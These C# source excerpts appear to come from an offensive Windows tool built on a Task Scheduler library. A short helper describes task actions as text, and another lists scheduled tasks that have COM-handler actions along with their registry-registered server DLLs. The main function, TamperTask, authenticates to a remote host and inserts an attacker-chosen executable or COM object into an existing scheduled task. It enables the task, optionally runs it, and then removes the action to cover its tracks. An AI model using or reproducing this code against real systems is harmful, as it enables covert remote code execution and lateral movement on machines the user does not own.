        /// <summary>
        /// Builds a one-line, human-readable description of a scheduled-task action.
        /// </summary>
        /// <param name="action">The task action to describe; may be null.</param>
        /// <returns>
        /// For an <see cref="ExecAction"/> the path followed by a space and its arguments; for a
        /// show-message, COM-handler or e-mail action a short label with the action's title,
        /// class name or subject; for anything else (including null) the text "unknown action.".
        /// </returns>
        private string GetCommandText(Action action)
        {
            // A type-pattern switch binds the concrete action type per case, replacing the
            // cascade of "as" casts and null checks. A null action matches no case and
            // therefore lands in the default branch.
            switch (action)
            {
                case ExecAction exec:
                    return $"{exec.Path} {exec.Arguments}";
                case ShowMessageAction message:
                    return $"Show message: '{message.Title}'";
                case ComHandlerAction com:
                    return $"COM handler: '{com.ClassName}'";
                case EmailAction email:
                    return $"Send email: '{email.Subject}'";
                default:
                    return "unknown action.";
            }
        }
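 /// <summary>
 /// Walks a task folder and all of its sub-folders and writes one tab-separated line for every
 /// <see cref="ComHandlerAction"/> found, resolving the action's CLSID against the registry so a
 /// reviewer can see which in-process server the task would load.
 /// </summary>
 /// <param name="output">Destination for the report lines.</param>
 /// <param name="tf">Folder to start from; sub-folders are visited recursively.</param>
 /// <remarks>
 /// Columns: task path, task name, CLSID, action data, registered class name, InprocServer32
 /// path, threading model, and "Yes"/"No" for whether the server file carries a managed
 /// assembly manifest. Registry lookups are best-effort: a missing key, a missing value or an
 /// access error leaves the affected columns empty instead of aborting the walk. Registry keys
 /// are disposed as soon as they have been read.
 /// </remarks>
 static void FindTaskWithComAction(System.IO.TextWriter output, TaskFolder tf)
 {
     foreach (Task t in tf.Tasks)
     {
         foreach (Microsoft.Win32.TaskScheduler.Action ac in t.Definition.Actions)
         {
             if (!(ac is ComHandlerAction a))
             {
                 continue;
             }

             string name = null, model = null, path = null, asm = null;
             // "B" formats the CLSID with braces, as it is keyed in the registry. A 32-bit server
             // on a 64-bit OS is registered under Wow6432Node, so that location is the fallback.
             string clsid = a.ClassId.ToString("B");
             try
             {
                 using (Microsoft.Win32.RegistryKey k =
                        Microsoft.Win32.Registry.ClassesRoot.OpenSubKey("CLSID\\" + clsid)
                     ?? Microsoft.Win32.Registry.ClassesRoot.OpenSubKey("Wow6432Node\\CLSID\\" + clsid))
                 {
                     // No registration at all: every registry-derived column stays empty.
                     if (k != null)
                     {
                         name = k.GetValue(null, "").ToString();
                         using (Microsoft.Win32.RegistryKey sk = k.OpenSubKey("InprocServer32"))
                         {
                             // A CLSID without InprocServer32 (e.g. out-of-process server) has no path or model here.
                             if (sk != null)
                             {
                                 path = sk.GetValue(null, "").ToString();
                                 model = sk.GetValue("ThreadingModel", "").ToString();
                                 if (!string.IsNullOrEmpty(path))
                                 {
                                     // Reading the assembly name succeeds only for a managed assembly;
                                     // native DLLs, missing files and unreadable paths all end up as "No".
                                     try
                                     {
                                         System.Reflection.AssemblyName.GetAssemblyName(path);
                                         asm = "Yes";
                                     }
                                     catch (System.Exception)
                                     {
                                         asm = "No";
                                     }
                                 }
                             }
                         }
                     }
                 }
             }
             catch (System.Exception)
             {
                 // Deliberately best-effort: a permission error or malformed registry value on one
                 // CLSID must not stop the enumeration. The partially filled columns are still
                 // written so the task itself is not lost from the report.
             }

             output.WriteLine("{0}\t{1}\t{2}\t{3}\t{4}\t{5}\t{6}\t{7}", t.Path, t.Name, a.ClassId, a.Data, name, path, model, asm);
         }
     }

     foreach (var f in tf.SubFolders)
     {
         FindTaskWithComAction(output, f);
     }
 }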
        /// <summary>
        /// Temporarily inserts an action at the top of an existing scheduled task on <paramref name="host"/>,
        /// re-registers the task, optionally runs it, and then removes the inserted action again.
        /// </summary>
        /// <param name="task">Path of the existing task to modify, as understood by <c>TaskService.GetTask</c>.</param>
        /// <param name="binary">Either an executable path or a CLSID; a value with exactly five '-'-separated parts is treated as a CLSID.</param>
        /// <param name="arguments">Command-line arguments; only used for the executable case.</param>
        /// <param name="run">When true, the task is triggered after it has been re-registered.</param>
        /// <param name="host">Remote host to connect to.</param>
        /// <param name="username">Account used for the connection.</param>
        /// <param name="password">Password for <paramref name="username"/>.</param>
        /// <param name="domain">Domain of <paramref name="username"/>.</param>
        /// <remarks>
        /// The task definition is re-registered twice (once with the injected action, once after cleanup),
        /// so both changes are visible to task-registration auditing on the target. NOTE(review): there is
        /// no try/finally around the run step; if <c>GetTaskInfo</c> or <c>t.Run()</c> throws, the injected
        /// action is left in the task. NOTE(review): the "enable the task" step is not reverted by the
        /// cleanup, so a task that was disabled before the call stays enabled afterwards.
        /// </remarks>
        private static void TamperTask(string task, string binary, string arguments, bool run, string host, string username, string password, string domain)
        {
            // AuthenticateToRemoteHost is defined elsewhere; presumably it returns null when the connection fails — confirm.
            TaskService ts = AuthenticateToRemoteHost(host, username, password, domain);

            if (ts != null)
            {
                Task t = ts.GetTask(task);
                if (t == null)
                {
                    Console.WriteLine("[+] Task not found!");
                    return;
                }


                // Heuristic: a GUID in "D" format has five '-'-separated groups. Anything else with five
                // dashes is mis-detected as a CLSID and new Guid(binary) below then throws FormatException.
                if (binary.Split('-').Length == 5) // weak parsing, I know but YOLO
                {
                    // we suppose we want to execute a COM object and not a binary
                    ComHandlerAction action = new ComHandlerAction(new Guid(binary), string.Empty);
                    // add to the top of the list, otherwise it will not execute
                    Console.WriteLine("[+] Adding custom action to task.. ");
                    t.Definition.Actions.Insert(0, action);

                    // enable the task in case it's disabled (not reverted during cleanup)
                    Console.WriteLine("[+] Enabling the task");
                    t.Definition.Settings.Enabled = true;
                    // First registration: the modified definition is written back to the host.
                    t.RegisterChanges();

                    // GetTaskInfo is defined elsewhere; it re-reads and prints the task as now registered.
                    GetTaskInfo(task, host, username, password, domain);
                    Console.WriteLine("\r\n");
                    // run it
                    if (run)
                    {
                        Console.WriteLine("[+] Triggering execution");
                        t.Run();
                    }


                    Console.WriteLine("[+] Cleaning up");
                    // remove the new action; the other actions and the Enabled change stay as they are
                    t.Definition.Actions.Remove(action);
                    // Second registration: writes the definition without the injected action.
                    t.RegisterChanges();
                }
                else
                {
                    // Third argument is the working directory; null leaves it unset.
                    ExecAction action = new ExecAction(binary, arguments, null);

                    // add to the top of the list, otherwise it will not execute
                    Console.WriteLine("[+] Adding custom action to task.. ");
                    t.Definition.Actions.Insert(0, action);

                    // enable the task in case it's disabled (not reverted during cleanup)
                    Console.WriteLine("[+] Enabling the task");
                    t.Definition.Settings.Enabled = true;
                    // First registration: the modified definition is written back to the host.
                    t.RegisterChanges();

                    // GetTaskInfo is defined elsewhere; it re-reads and prints the task as now registered.
                    GetTaskInfo(task, host, username, password, domain);
                    Console.WriteLine("\r\n");
                    // run it
                    if (run)
                    {
                        Console.WriteLine("[+] Triggering execution");
                        t.Run();
                    }


                    Console.WriteLine("[+] Cleaning up");
                    // remove the new action; the other actions and the Enabled change stay as they are
                    t.Definition.Actions.Remove(action);
                    // Second registration: writes the definition without the injected action.
                    t.RegisterChanges();
                }
            }
        }